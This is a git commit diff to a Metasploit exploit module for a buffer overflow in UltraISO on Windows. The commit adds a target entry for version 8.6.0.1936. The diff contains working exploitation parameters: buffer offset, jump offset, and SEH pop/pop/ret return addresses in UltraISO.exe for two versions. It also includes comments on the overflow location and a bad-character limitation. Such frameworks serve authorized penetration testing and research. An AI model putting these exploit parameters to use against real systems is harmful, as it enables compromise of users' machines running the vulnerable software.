add a target for v8.6.0.1936
git-svn-id: file:///home/svn/framework3/trunk@8955 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
e45a29fd4a
commit
b2f3e91c8b
|
@ -50,21 +50,25 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# Tested OK on:
|
||||
# v8.6.2.2011 (portable)
|
||||
|
||||
# BOF @ 0x005e1f8b
|
||||
|
||||
# The EXE base addr contains a bad char (nul). This prevents us from
|
||||
# using the super-elite multi-offset SEH exploitation method.
|
||||
|
||||
[ 'Windows Universal',
|
||||
[ 'Windows - UltraISO v8.6.2.2011 portable',
|
||||
{
|
||||
'Offset' => 1100,
|
||||
'JmpOff' => 0x30, # offset from the end to our jmp
|
||||
'Ret' => 0x00594740 # add esp, 0x64 / p/p/p/r in unpacked UltraISO.exe
|
||||
}
|
||||
],
|
||||
[ 'Windows - UltraISO v8.6.0.1936',
|
||||
{
|
||||
'Offset' => 1100,
|
||||
'JmpOff' => 0x30, # offset from the end to our jmp
|
||||
'Ret' => 0x0059170c # add esp, 0x64 / p/p/p/r in unpacked UltraISO.exe
|
||||
}
|
||||
],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'May 24 2007',
|
||||
|
|
Loading…
Reference in New Issue